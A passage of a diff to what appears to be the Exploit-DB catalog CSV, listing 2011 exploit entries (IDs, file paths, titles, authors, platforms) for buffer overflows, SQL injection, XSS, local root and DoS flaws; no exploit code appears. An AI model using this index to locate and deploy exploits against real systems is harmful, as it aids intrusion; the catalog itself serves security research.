Infinite Loop Denial of Service",2011-01-11,"Fred Fierling",multiple,dos,0 15974,platforms/linux/dos/15974.txt,"Mono/Moonlight Generic Type Argument Local Privilege Escalation",2011-01-11,"Chris Howie",linux,dos,0 +16264,platforms/windows/local/16264.pl,"Magic Music Editor - Buffer Overflow Exploit",2011-03-02,"C4SS!0 G0M3S",windows,local,0 15975,platforms/windows/local/15975.py,"Nokia Multimedia Player 1.0 SEH Unicode Exploit",2011-01-11,"Carlos Mario Penagos Hollmann",windows,local,0 -15979,platforms/php/webapps/15979.txt,"Joomla! Spam Mail Relay Vulnerability",2011-01-12,"Jeff Channell",php,webapps,0 15981,platforms/php/webapps/15981.txt,"LifeType 1.2.10 HTTP Referer stored XSS",2011-01-12,"Saif El-Sherei",php,webapps,0 15984,platforms/windows/remote/15984.html,"Microsoft Data Access Components Vulnerability (MS11-002)",2011-01-12,"Peter Vreugdenhil",windows,remote,0 +15979,platforms/php/webapps/15979.txt,"Joomla! Spam Mail Relay Vulnerability",2011-01-12,"Jeff Channell",php,webapps,0 15985,platforms/windows/local/15985.c,"Win32k - Keyboard Layout Vulnerability (MS10-073)",2011-01-13,"Ruben Santamarta ",windows,local,0 -15986,platforms/windows/dos/15986.py,"Blackmoon FTP 3.1 Build 1735,1736 DoS",2011-01-13,"Craig Freyman",windows,dos,0 +15986,platforms/windows/dos/15986.py,"Blackmoon FTP 3.1 Build 1735/1736 - DoS",2011-01-13,"Craig Freyman",windows,dos,0 15987,platforms/cgi/webapps/15987.py,"SiteScape Enterprise Forum 7 TCL Injection",2011-01-13,"Spencer McIntyre",cgi,webapps,0 +16020,platforms/php/webapps/16020.txt,"PHP Lowbids viewfaqs.php Blind SQL Injection Vulnerability",2011-01-20,"BorN To K!LL",php,webapps,0 15988,platforms/windows/dos/15988.py,"Objectivity/DB Lack of Authentication Remote Exploit",2011-01-14,"Jeremy Brown",windows,dos,0 15989,platforms/php/webapps/15989.txt,"People Joomla Component 1.0.0 - SQL Injection Vulnerability",2011-01-14,"Salvatore Fresta",php,webapps,0 -15991,platforms/windows/remote/15991.html,"Real Networks RealPlayer SP 'RecordClip' Method Remote Code Execution",2011-01-14,"Sean de Regge",windows,remote,0 15992,platforms/windows/dos/15992.txt,"Sielco Sistemi Winlog <= 2.07.00 - Stack Overflow",2011-01-14,"Luigi Auriemma",windows,dos,0 15993,platforms/php/webapps/15993.html,"viart shop 4.0.5 - CSRF Vulnerability",2011-01-15,Or4nG.M4N,php,webapps,0 15994,platforms/windows/local/15994.rb,"eXtremeMP3 Player - Buffer Overflow (SEH)",2011-01-15,"C4SS!0 G0M3S",windows,local,0 @@ -13823,23 +13859,23 @@ id,file,description,date,author,platform,type,port 15997,platforms/jsp/webapps/15997.py,"MeshCMS 3.5 - Remote Code Execution Exploit",2011-01-16,mr_me,jsp,webapps,0 15998,platforms/windows/dos/15998.txt,"Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys <= 2011.1.13.89 - Local Kernel Mode DoS Exploit",2011-01-16,MJ0011,windows,dos,0 15999,platforms/php/webapps/15999.txt,"BetMore Site Suite 4 (bid) Blind SQL Injection Vulnerability",2011-01-16,"BorN To K!LL",php,webapps,0 +16002,platforms/windows/dos/16002.html,"ActiveX UserManager 2.03 - Buffer Overflow",2011-01-16,blake,windows,dos,0 16000,platforms/php/webapps/16000.txt,"Seo Panel 2.2.0 Cookie-Rendered Persistent XSS Vulnerability",2011-01-16,"Mark Stanislav",php,webapps,0 16001,platforms/php/webapps/16001.txt,"People Joomla Component 1.0.0 - Local File Inclusion Vulnerability",2011-01-16,"ALTBTA ",php,webapps,0 -16002,platforms/windows/dos/16002.html,"ActiveX UserManager 2.03 - Buffer Overflow",2011-01-16,blake,windows,dos,0 16003,platforms/php/webapps/16003.txt,"AWBS 2.9.2 (cart.php) Blind SQL Injection Vulnerability",2011-01-16,ShivX,php,webapps,0 16004,platforms/php/webapps/16004.txt,"PHP-Fusion Teams Structure Infusion Addon SQL Injection",2011-01-17,Saif,php,webapps,0 16006,platforms/cgi/webapps/16006.html,"SmoothWall Express 3.0 - Multiple Vulnerabilities",2011-01-17,"dave b",cgi,webapps,0 -16007,platforms/php/webapps/16007.txt,"AneCMS 1.3 - Persistant XSS Vulnerability",2011-01-17,Penguin,php,webapps,0 16009,platforms/windows/local/16009.pl,"A-PDF All to MP3 Converter 2.0.0 - (.wav) Buffer Overflow Exploit",2011-01-18,h1ch4m,windows,local,0 16010,platforms/php/webapps/16010.txt,"allCineVid Joomla Component 1.0.0 - Blind SQL Injection Vulnerability",2011-01-18,"Salvatore Fresta",php,webapps,0 16011,platforms/php/webapps/16011.txt,"CakePHP <= 1.3.5 / 1.2.8 unserialize() Vulnerability",2011-01-18,felix,php,webapps,0 -16012,platforms/windows/dos/16012.html,"Google Chrome 8.0.552.237 - address Overflow DoS",2011-01-18,"Vuk Ivanovic",windows,dos,0 16013,platforms/php/webapps/16013.html,"N-13 News 3.4 - Remote Admin Add CSRF Exploit",2011-01-18,anT!-Tr0J4n,php,webapps,0 16014,platforms/windows/remote/16014.html,"Novell iPrint <= 5.52 - ActiveX GetDriverSettings() Remote Exploit (ZDI-10-256)",2011-01-19,Dr_IDE,windows,remote,0 +17209,platforms/php/webapps/17209.txt,"SoftMP3 SQL Injection Vulnerability",2011-04-24,mArTi,php,webapps,0 +17210,platforms/windows/local/17210.rb,"eZip Wizard 3.0 - Stack Buffer Overflow",2011-04-25,metasploit,windows,local,0 16016,platforms/php/webapps/16016.txt,"Simploo CMS 1.7.1 PHP Code Execution",2011-01-19,"David Vieira-Kurz",php,webapps,0 +16039,platforms/php/webapps/16039.txt,"Joomla B2 Portfolio Component 1.0.0 - Multiple SQL Injection",2011-01-24,"Salvatore Fresta",php,webapps,0 16018,platforms/php/webapps/16018.txt,"PHP auctions (viewfaqs.php) Blind SQL Injection Vulnerability",2011-01-19,"BorN To K!LL",php,webapps,0 16019,platforms/php/webapps/16019.txt,"Phpcms 2008 SQL Injection Vulnerability",2011-01-20,R3d-D3V!L,php,webapps,0 -16020,platforms/php/webapps/16020.txt,"PHP Lowbids viewfaqs.php Blind SQL Injection Vulnerability",2011-01-20,"BorN To K!LL",php,webapps,0 16021,platforms/windows/dos/16021.c,"Look n stop 0day Local DoS",2011-01-21,Heurs,windows,dos,0 16022,platforms/windows/dos/16022.c,"Panda Global Protection 2010 - Local DoS",2011-01-21,Heurs,windows,dos,0 16023,platforms/windows/dos/16023.c,"Panda Global Protection 2010 - Local DoS (unfiltered wcscpy())",2011-01-21,Heurs,windows,dos,0 @@ -13853,12 +13889,13 @@ id,file,description,date,author,platform,type,port 16036,platforms/windows/remote/16036.rb,"Golden FTP Server 4.70 - PASS Command Buffer Overflow Exploit",2011-01-23,"cd1zz and iglesiasgg",windows,remote,0 16037,platforms/php/webapps/16037.html,"PHP Link Directory 4.1.0 - CSRF Vulnerability (Add Admin)",2011-01-23,"AtT4CKxT3rR0r1ST ",php,webapps,0 16038,platforms/windows/dos/16038.py,"Inetserv 3.23 POP3 - Denial of Service",2011-01-24,dmnt,windows,dos,0 -16039,platforms/php/webapps/16039.txt,"Joomla B2 Portfolio Component 1.0.0 - Multiple SQL Injection",2011-01-24,"Salvatore Fresta",php,webapps,0 16040,platforms/windows/dos/16040.py,"Automated Solutions Modbus/TCP OPC Server Remote Heap Corruption PoC",2011-01-25,"Jeremy Brown",windows,dos,0 16041,platforms/multiple/remote/16041.txt,"Sun Microsystems SunScreen Firewall Root Exploit",2011-01-25,kingcope,multiple,remote,0 16042,platforms/windows/dos/16042.rb,"Opera Web Browser 11.00 - Integer Overflow Vulnerability",2011-01-25,"C4SS!0 G0M3S",windows,dos,0 +16060,platforms/php/webapps/16060.txt,"comercioplus 5.6 - Multiple Vulnerabilities",2011-01-27,"Daniel Godoy",php,webapps,0 16044,platforms/php/webapps/16044.txt,"ab Web CMS 1.35 - Multiple Vulnerabilities",2011-01-25,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 16047,platforms/php/webapps/16047.txt,"PHPDirector Game Edition (game.php) SQL Injection Vulnerability",2011-01-26,"AtT4CKxT3rR0r1ST ",php,webapps,0 +16110,platforms/php/webapps/16110.txt,"reos 2.0.5 - Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",php,webapps,0 16049,platforms/php/webapps/16049.txt,"AWCM 2.2 final - Local File Inclusion Vulnerability",2011-01-26,Cucura,php,webapps,0 16050,platforms/php/webapps/16050.txt,"class.upload.php 0.30 - Remote File Upload Vulnerability",2011-01-26,DIES3L,php,webapps,0 16051,platforms/php/webapps/16051.txt,"Froxlor 0.9.15 - Remote File Inclusion Vulnerbility",2011-01-26,DIES3L,php,webapps,0 @@ -13869,14 +13906,13 @@ id,file,description,date,author,platform,type,port 16056,platforms/windows/remote/16056.txt,"Oracle Document Capture Insecure READ Method",2011-01-26,"Alexey Sintsov",windows,remote,0 16058,platforms/php/webapps/16058.txt,"MultiPowUpload 2.1 - Remote File Upload Vulnerability",2011-01-26,DIES3L,php,webapps,0 16059,platforms/php/webapps/16059.txt,"Xnova Legacies 2009.2 - CSRF Vulnerability",2011-01-26,"Xploit A Day",php,webapps,0 -16060,platforms/php/webapps/16060.txt,"comercioplus 5.6 - Multiple Vulnerabilities",2011-01-27,"Daniel Godoy",php,webapps,0 16061,platforms/php/webapps/16061.txt,"PHP Link Directory Software (sbcat_id) SQL Injection Vulnerability",2011-01-28,"BorN To K!LL",php,webapps,0 16062,platforms/php/webapps/16062.txt,"PHP Classified ads software (cid) Blind SQL Injection Vulnerability",2011-01-28,"BorN To K!LL",php,webapps,0 16064,platforms/bsd/dos/16064.c,"FreeBSD 8.0 - Local Denial of Service (forced reboot)",2011-01-28,kingcope,bsd,dos,0 -16068,platforms/hardware/dos/16068.pl,"Polycom SoundPoint IP Devices Denial of Service",2011-01-28,"pawel gawinek",hardware,dos,0 16069,platforms/php/webapps/16069.txt,"PHP Script Directory Software (sbcat_id) SQL Injection Vulnerability",2011-01-28,"BorN To K!LL",php,webapps,0 16070,platforms/windows/local/16070.py,"Virtuosa Phoenix Edition 5.2 ASX SEH BOF",2011-01-28,Acidgen,windows,local,0 16071,platforms/windows/local/16071.txt,"Microsoft Internet Explorer MHTML Protocol Handler XSS",2011-01-29,80vul,windows,local,0 +16068,platforms/hardware/dos/16068.pl,"Polycom SoundPoint IP Devices Denial of Service",2011-01-28,"pawel gawinek",hardware,dos,0 16072,platforms/windows/local/16072.py,"WM Downloader 3.1.2.2 2010.04.15 - (.m3u) Buffer Overflow + DEP Bypass",2011-01-29,sickness,windows,local,0 16073,platforms/windows/local/16073.pl,"A-PDF All to MP3 Converter 2.0.0 - (.wav) Buffer Overflow (seh)",2011-01-29,m0nna,windows,local,0 16074,platforms/php/webapps/16074.txt,"MultiCMS Local File Inclusion Vulnerbility",2011-01-29,R3VAN_BASTARD,php,webapps,0 @@ -13888,9 +13924,9 @@ id,file,description,date,author,platform,type,port 16080,platforms/php/webapps/16080.txt,"RW-Download 4.0.6 - (index.php) SQL Injection Vulnerability",2011-01-30,Dr.NeT,php,webapps,0 16083,platforms/windows/local/16083.rb,"NetZip Classic Buffer Overflow Exploit (SEH)",2011-01-30,"C4SS!0 G0M3S",windows,local,0 16084,platforms/windows/dos/16084.html,"Maxthon Browser 3.0.20.1000 - ref / replace DoS",2011-01-30,"Carlos Mario Penagos Hollmann",windows,dos,0 +16272,platforms/php/webapps/16272.txt,"Limelight Software (article.php) SQL Injection Vulnerability",2011-03-04,eXeSoul,php,webapps,0 16085,platforms/windows/local/16085.py,"AOL 9.5 (rtx) Local Buffer Overflow Exploit",2011-01-31,sup3r,windows,local,0 16086,platforms/linux/local/16086.txt,"OpenVAS Manager Command Injection Vulnerability",2011-01-31,"Tim Brown",linux,local,0 -16087,platforms/php/webapps/16087.txt,"PMB Services <= 3.4.3 - SQL Injection Vunerability",2011-02-01,Luchador,php,webapps,0 16088,platforms/php/webapps/16088.php,"NetLink Arbitrary File Upload Vulnerability",2011-02-01,lumut--,php,webapps,0 16090,platforms/php/webapps/16090.txt,"TinyWebGallery 1.8.3 - Multiple Vulnerabilities",2011-02-01,"Yam Mesicka",php,webapps,0 16091,platforms/php/webapps/16091.txt,"Joomla! 1.5 & 1.6 - JFilterInput XSS Bypass",2011-02-01,"Jeff Channell",php,webapps,0 @@ -13901,7 +13937,7 @@ id,file,description,date,author,platform,type,port 16097,platforms/php/webapps/16097.txt,"Zikula CMS <= 1.2.4 - CSRF Vulnerability",2011-02-02,"Aung Khant",php,webapps,0 16098,platforms/android/local/16098.c,"Android 1.x/2.x HTC Wildfire - Local Root Exploit",2011-02-02,"The Android Exploid Crew",android,local,0 16099,platforms/android/local/16099.c,"Android 1.x/2.x - Local Root Exploit",2011-02-02,"The Android Exploid Crew",android,local,0 -16100,platforms/hardware/remote/16100.txt,"Tandberg E, EX and C Series Endpoints Default Credentials for Root Account",2011-02-02,"Cisco Security",hardware,remote,0 +16100,platforms/hardware/remote/16100.txt,"Tandberg E & EX & C Series Endpoints - Default Credentials for Root Account",2011-02-02,"Cisco Security",hardware,remote,0 16101,platforms/windows/remote/16101.py,"FTPGetter 3.58.0.21 - Buffer Overflow (PASV) Exploit",2011-02-03,modpr0be,windows,remote,0 16102,platforms/php/webapps/16102.txt,"Islam Sound IV2 - (details.php) Remote SQL Injection",2011-02-03,ZxH-Labs,php,webapps,0 16103,platforms/multiple/remote/16103.txt,"Majordomo2 - Directory Traversal (SMTP/HTTP)",2011-02-03,"Michael Brooks",multiple,remote,0 @@ -13910,7 +13946,6 @@ id,file,description,date,author,platform,type,port 16107,platforms/windows/local/16107.py,"AOL Desktop 9.6 - (.rtx) Buffer Overflow",2011-02-03,sickness,windows,local,0 16108,platforms/multiple/dos/16108.txt,"VLC Media Player Subtitle StripTags() Function Memory Corruption",2011-02-03,"Harry Sintonen",multiple,dos,0 16109,platforms/php/webapps/16109.txt,"podcast generator 1.3 - Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",php,webapps,0 -16110,platforms/php/webapps/16110.txt,"reos 2.0.5 - Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",php,webapps,0 16113,platforms/php/webapps/16113.txt,"oscommerce authentication bypass",2011-02-04,"Nicolas Krassas",php,webapps,0 16114,platforms/php/webapps/16114.txt,"Chamilo 1.8.7 / Dokeos 1.8.6 - Remote File Disclosure",2011-02-05,beford,php,webapps,0 16116,platforms/php/webapps/16116.txt,"Qcodo Development Framework 0.3.3 Full Info Disclosure",2011-02-05,"Daniel Godoy",php,webapps,0 @@ -13919,7 +13954,7 @@ id,file,description,date,author,platform,type,port 16120,platforms/windows/dos/16120.py,"Hanso Player 1.4.0.0 - Buffer Overflow - DoS Skinfile",2011-02-06,badc0re,windows,dos,0 16121,platforms/windows/dos/16121.py,"Hanso Converter 1.1.0 - BufferOverflow Denial of Service",2011-02-06,badc0re,windows,dos,0 16122,platforms/php/webapps/16122.txt,"Dew-NewPHPLinks 2.1b (index.php) - SQL Injection Vulnerability",2011-02-06,"AtT4CKxT3rR0r1ST ",php,webapps,0 -16123,platforms/hardware/remote/16123.txt,"Comcast DOCSIS 3.0 Business Gateways Multiple Vulnerabilities",2011-02-06,"Trustwave's SpiderLabs",hardware,remote,0 +16221,platforms/php/webapps/16221.txt,"Comment Rating 2.9.23 Wordpress Plugin Multiple Vulnerabilities",2011-02-23,"High-Tech Bridge SA",php,webapps,0 16127,platforms/php/webapps/16127.txt,"T-Content Managment System Multiple Vulnerabilities",2011-02-07,"Daniel Godoy",php,webapps,0 16128,platforms/php/webapps/16128.txt,"jakcms 2.0 pro rc5 - Stored XSS via useragent http header injection",2011-02-07,"Saif El-Sherei",php,webapps,0 16129,platforms/linux/dos/16129.txt,"ProFTPD mod_sftp Integer Overflow DoS PoC",2011-02-07,kingcope,linux,dos,0 @@ -13935,9 +13970,14 @@ id,file,description,date,author,platform,type,port 16139,platforms/php/webapps/16139.txt,"Auto Database System 1.0 Infusion Addon SQL Injection Vulnerability",2011-02-09,Saif,php,webapps,0 16140,platforms/php/webapps/16140.txt,"Web 2.0 Social Network Freunde Community SQL Injection Vunerability",2011-02-09,NoNameMT,php,webapps,0 16141,platforms/windows/local/16141.py,"xRadio 0.95b (.xrl) Local Buffer Overflow (SEH)",2011-02-09,b0telh0,windows,local,0 +16167,platforms/php/webapps/16167.txt,"jSchool Advanced SQL Injection Vulnerability",2011-02-14,eXa.DisC,php,webapps,0 +16168,platforms/php/webapps/16168.txt,"runcms 2.2.2 - Multiple Vulnerabilities",2011-02-14,"High-Tech Bridge SA",php,webapps,0 16143,platforms/php/webapps/16143.txt,"MihanTools Script 1.3.3 - SQL Injection Vulnerability",2011-02-09,WHITE_DEVIL,php,webapps,0 16144,platforms/php/webapps/16144.txt,"Enable Media Replace WordPress Plugin Multiple Vulnerabilities",2011-02-09,"Ulf Harnhammar",php,webapps,0 16145,platforms/windows/remote/16145.pl,"Unreal Tournament Remote Buffer Overflow Exploit (SEH)",2011-02-09,Fulcrum,windows,remote,0 +16183,platforms/php/webapps/16183.txt,"GAzie 5.10 (Login parameter) Multiple Vulnerabilities",2011-02-17,LiquidWorm,php,webapps,0 +16165,platforms/php/webapps/16165.txt,"AWCM 2.2 Final - Persistent Cross-Site Script Vulnerability",2011-02-14,_84kur10_,php,webapps,0 +16166,platforms/windows/dos/16166.py,"Microsoft Windows 2003 - AD Pre-Auth BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,windows,dos,0 16148,platforms/php/webapps/16148.txt,"SourceBans 1.4.7 - XSS Vulnerability",2011-02-09,Sw1tCh,php,webapps,0 16149,platforms/hardware/remote/16149.txt,"Linksys WAP610N Unauthenticated Root Access Security Vulnerability",2011-02-10,"Matteo Ignaccolo",hardware,remote,0 16150,platforms/windows/dos/16150.py,"XM Easy Personal FTP Server 5.8.0 (TYPE) Denial of Service",2011-02-10,"Houssam Sahli",windows,dos,0 @@ -13945,34 +13985,33 @@ id,file,description,date,author,platform,type,port 16153,platforms/windows/local/16153.py,"MoviePlay 4.82 - (.lst) Buffer Overflow",2011-02-11,sickness,windows,local,0 16154,platforms/php/webapps/16154.txt,"Horde Horde_Image::factory driver Argument Local File Inclusion",2011-02-11,skysbsb,php,webapps,0 16155,platforms/php/webapps/16155.txt,"Geomi CMS 1.2 & 3.0 - SQL Injection Vulnerability",2011-02-11,"ThunDEr HeaD",php,webapps,0 -16156,platforms/php/webapps/16156.txt,"Kunena < 1.5.13, < 1.6.3 - SQL Injection Vulnerability",2011-02-11,"Red Matter",php,webapps,0 +16156,platforms/php/webapps/16156.txt,"Kunena < 1.5.13_ < 1.6.3 - SQL Injection Vulnerability",2011-02-11,"Red Matter",php,webapps,0 16157,platforms/jsp/webapps/16157.py,"Openedit <= 5.1294 - Remote Code Execution Exploit",2011-02-11,mr_me,jsp,webapps,0 16158,platforms/php/webapps/16158.txt,"TaskFreak! 0.6.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,php,webapps,0 16159,platforms/php/webapps/16159.txt,"Escort Agency CMS Blind SQL Injection Vunerability",2011-02-12,NoNameMT,php,webapps,0 16160,platforms/php/webapps/16160.txt,"Pixelpost 1.7.3 - Multiple POST Variables SQL Injection Vulnerability",2011-02-12,LiquidWorm,php,webapps,0 16162,platforms/windows/local/16162.pl,"CuteZip 2.1 - Buffer Overflow Exploit",2011-02-12,"C4SS!0 G0M3S",windows,local,0 -16165,platforms/php/webapps/16165.txt,"AWCM 2.2 Final - Persistent Cross-Site Script Vulnerability",2011-02-14,_84kur10_,php,webapps,0 -16166,platforms/windows/dos/16166.py,"Microsoft Windows 2003 - AD Pre-Auth BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,windows,dos,0 -16167,platforms/php/webapps/16167.txt,"jSchool Advanced SQL Injection Vulnerability",2011-02-14,eXa.DisC,php,webapps,0 -16168,platforms/php/webapps/16168.txt,"runcms 2.2.2 - Multiple Vulnerabilities",2011-02-14,"High-Tech Bridge SA",php,webapps,0 16169,platforms/windows/local/16169.py,"Oracle 10/11g exp.exe - param file Local Buffer Overflow PoC Exploit",2011-02-15,mr_me,windows,local,0 16170,platforms/php/webapps/16170.txt,"phpMyBitTorrent 2.0.4 - SQL Injection Vulnerability",2011-02-15,#forkbombers,php,webapps,0 16171,platforms/cfm/webapps/16171.py,"Lingxia I.C.E CMS Remote Blind SQL Injection Exploit",2011-02-15,mr_me,cfm,webapps,0 16172,platforms/php/webapps/16172.txt,"omegabill 1.0 build 6 - Multiple Vulnerabilities",2011-02-15,"AutoSec Tools",php,webapps,0 +16176,platforms/windows/remote/16176.pl,"ActFax Server (LPD/LPR) 4.25 Build 0221 (2010-02-11) - Remote Buffer Overflow Exploit",2011-02-16,chap0,windows,remote,0 16173,platforms/windows/local/16173.py,"AutoPlay 1.33 (autoplay.ini) - Local Buffer Overflow Exploit (SEH)",2011-02-15,badc0re,windows,local,0 16175,platforms/php/webapps/16175.txt,"Seo Panel 2.2.0 - SQL Injection Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0 -16176,platforms/windows/remote/16176.pl,"ActFax Server (LPD/LPR) 4.25, Build 0221 (2010-02-11) - Remote Buffer Overflow Exploit",2011-02-16,chap0,windows,remote,0 -16177,platforms/windows/remote/16177.py,"ActFax Server FTP 4.25, Build 0221 (2010-02-11) - Remote BoF (Post Auth)",2011-02-16,chap0,windows,remote,0 +16177,platforms/windows/remote/16177.py,"ActFax Server FTP 4.25 Build 0221 (2010-02-11) - Remote BoF (Post Auth)",2011-02-16,chap0,windows,remote,0 16178,platforms/asp/webapps/16178.txt,"Rae Media Real Estate Single Agent SQL Injection Vulnerability",2011-02-16,R4dc0re,asp,webapps,0 16179,platforms/asp/webapps/16179.txt,"Rae Media Real Estate Multi Agent SQL Injection Vulnerability",2011-02-16,R4dc0re,asp,webapps,0 16180,platforms/windows/dos/16180.py,"BWMeter 5.4.0 - (.csv) Denial of Service Vulnerability",2011-02-17,b0telh0,windows,dos,0 16181,platforms/php/webapps/16181.txt,"WordPress User Photo Component Remote File Upload Vulnerability",2011-02-17,ADVtools,php,webapps,0 16182,platforms/linux/dos/16182.txt,"PHP 5.3.5 grapheme_extract() NULL Pointer Dereference",2011-02-17,"Maksymilian Arciemowicz",linux,dos,0 -16183,platforms/php/webapps/16183.txt,"GAzie 5.10 (Login parameter) Multiple Vulnerabilities",2011-02-17,LiquidWorm,php,webapps,0 +16193,platforms/windows/dos/16193.pl,"Avira AntiVir QUA file - (avcenter.exe) Local Crash PoC",2011-02-19,KedAns-Dz,windows,dos,0 +16204,platforms/windows/dos/16204.pl,"Solar FTP 2.1 - Denial of Service Exploit",2011-02-22,x000,windows,dos,0 16190,platforms/windows/dos/16190.pl,"IBM Lotus Domino LDAP Bind Request Remote Code Execution Vulnerability",2011-02-18,"Francis Provencher",windows,dos,0 16191,platforms/windows/dos/16191.pl,"Novell ZenWorks 10 & 11 - TFTPD Remote Code Execution Vulnerability",2011-02-18,"Francis Provencher",windows,dos,0 16192,platforms/linux/dos/16192.pl,"Novell Iprint LPD Remote Code Execution Vulnerability",2011-02-18,"Francis Provencher",linux,dos,0 -16193,platforms/windows/dos/16193.pl,"Avira AntiVir QUA file - (avcenter.exe) Local Crash PoC",2011-02-19,KedAns-Dz,windows,dos,0 +16254,platforms/windows/dos/16254.txt,"Nitro PDF Reader 1.4.0 Heap Memory Corruption PoC",2011-02-28,LiquidWorm,windows,dos,0 +16225,platforms/cfm/webapps/16225.txt,"Alcassoft's SOPHIA CMS SQL Injection Vulnerability",2011-02-24,p0pc0rn,cfm,webapps,0 +16226,platforms/hardware/remote/16226.txt,"iSO Air Files 2.6 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0 16196,platforms/php/webapps/16196.txt,"eventum issue tracking system 2.3.1 - Stored XSS",2011-02-19,"Saif El-Sherei",php,webapps,0 16197,platforms/php/webapps/16197.txt,"Escort Directory CMS SQL Injection Vunerability",2011-02-19,NoNameMT,php,webapps,0 16198,platforms/php/webapps/16198.txt,"Independent Escort CMS Blind SQL Injection Vunerability",2011-02-19,NoNameMT,php,webapps,0 @@ -13980,24 +14019,21 @@ id,file,description,date,author,platform,type,port 16200,platforms/php/webapps/16200.py,"JAKCMS <= 2.01 - Code Execution Exploit",2011-02-20,mr_me,php,webapps,0 16201,platforms/php/webapps/16201.py,"JAKCMS <= 2.01 RC1 - Blind SQL Injection Exploit",2011-02-20,mr_me,php,webapps,0 16202,platforms/php/webapps/16202.txt,"Woltlab Burning Board 2.3.6 Addon (hilfsmittel.php) SQL Injection Vulnerability",2011-02-21,Crazyball,php,webapps,0 +16253,platforms/windows/local/16253.py,"Elecard AVC_HD/MPEG Player 5.7 - Buffer Overflow",2011-02-27,sickness,windows,local,0 16203,platforms/windows/dos/16203.txt,"WinMerge 2.12.4 - Project File Handling Stack Overflow Vulnerability",2011-02-22,LiquidWorm,windows,dos,0 -16204,platforms/windows/dos/16204.pl,"Solar FTP 2.1 - Denial of Service Exploit",2011-02-22,x000,windows,dos,0 16205,platforms/asp/webapps/16205.txt,"DIY Web CMS - Multiple Vulnerabilities",2011-02-22,p0pc0rn,asp,webapps,0 16206,platforms/php/webapps/16206.txt,"Galilery 1.0 - Local File Inclusion Vulnerability",2011-02-22,lemlajt,php,webapps,0 16207,platforms/php/webapps/16207.txt,"dotproject 2.1.5 - Multiple Vulnerabilities",2011-02-22,lemlajt,php,webapps,0 +16216,platforms/linux/dos/16216.txt,"Red Hat Linux stickiness of /tmp",2011-02-23,"Tavis Ormandy",linux,dos,0 16208,platforms/ios/remote/16208.txt,"iOS FtpDisc 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0 16209,platforms/ios/remote/16209.txt,"iOS SideBooks 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0 -16213,platforms/php/webapps/16213.txt,"Hyena Cart (index.php) SQL Injection Vulnerability",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0 -16214,platforms/php/webapps/16214.txt,"tplSoccerStats (player.php) SQL Injection Vulnerability",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0 -16216,platforms/linux/dos/16216.txt,"Red Hat Linux stickiness of /tmp",2011-02-23,"Tavis Ormandy",linux,dos,0 -16217,platforms/php/webapps/16217.txt,"bitweaver 2.8.1 Persistent XSS Vulnerability",2011-02-23,lemlajt,php,webapps,0 -16218,platforms/php/webapps/16218.txt,"Z-Vote 1.1 Wordpress Plugin SQL Injection Vulnerability",2011-02-23,"High-Tech Bridge SA",php,webapps,0 -16220,platforms/php/webapps/16220.py,"ProQuiz 2.0.0b Arbitrary Upload Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0 -16221,platforms/php/webapps/16221.txt,"Comment Rating 2.9.23 Wordpress Plugin Multiple Vulnerabilities",2011-02-23,"High-Tech Bridge SA",php,webapps,0 16222,platforms/php/webapps/16222.txt,"course registration management system 2.1 - Multiple Vulnerabilities",2011-02-23,"AutoSec Tools",php,webapps,0 16223,platforms/php/webapps/16223.txt,"VidiScript SQL Injection Vulnerability",2011-02-23,ThEtA.Nu,php,webapps,0 -16225,platforms/cfm/webapps/16225.txt,"Alcassoft's SOPHIA CMS SQL Injection Vulnerability",2011-02-24,p0pc0rn,cfm,webapps,0 -16226,platforms/hardware/remote/16226.txt,"iSO Air Files 2.6 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0 +16220,platforms/php/webapps/16220.py,"ProQuiz 2.0.0b Arbitrary Upload Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0 +16218,platforms/php/webapps/16218.txt,"Z-Vote 1.1 Wordpress Plugin SQL Injection Vulnerability",2011-02-23,"High-Tech Bridge SA",php,webapps,0 +16213,platforms/php/webapps/16213.txt,"Hyena Cart (index.php) SQL Injection Vulnerability",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0 +16214,platforms/php/webapps/16214.txt,"tplSoccerStats (player.php) SQL Injection Vulnerability",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0 +16217,platforms/php/webapps/16217.txt,"bitweaver 2.8.1 Persistent XSS Vulnerability",2011-02-23,lemlajt,php,webapps,0 16227,platforms/hardware/remote/16227.txt,"iSO Filer Lite 2.1.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0 16228,platforms/ios/remote/16228.txt,"iOS iDocManager 1.0.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0 16229,platforms/ios/remote/16229.txt,"iOS myDBLite 1.1.10 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0 @@ -14024,8 +14060,6 @@ id,file,description,date,author,platform,type,port 16250,platforms/php/webapps/16250.txt,"jQuery Mega Menu 1.0 Wordpress Plugin Local File Inclusion",2011-02-26,"AutoSec Tools",php,webapps,0 16251,platforms/php/webapps/16251.txt,"OPS Old Post Spinner 2.2.1 Wordpress Plugin LFI Vulnerability",2011-02-26,"AutoSec Tools",php,webapps,0 16252,platforms/hardware/webapps/16252.html,"Linksys Cisco WAG120N CSRF Vulnerability",2011-02-26,IRCRASH,hardware,webapps,0 -16253,platforms/windows/local/16253.py,"Elecard AVC_HD/MPEG Player 5.7 - Buffer Overflow",2011-02-27,sickness,windows,local,0 -16254,platforms/windows/dos/16254.txt,"Nitro PDF Reader 1.4.0 Heap Memory Corruption PoC",2011-02-28,LiquidWorm,windows,dos,0 16255,platforms/windows/dos/16255.pl,"Magic 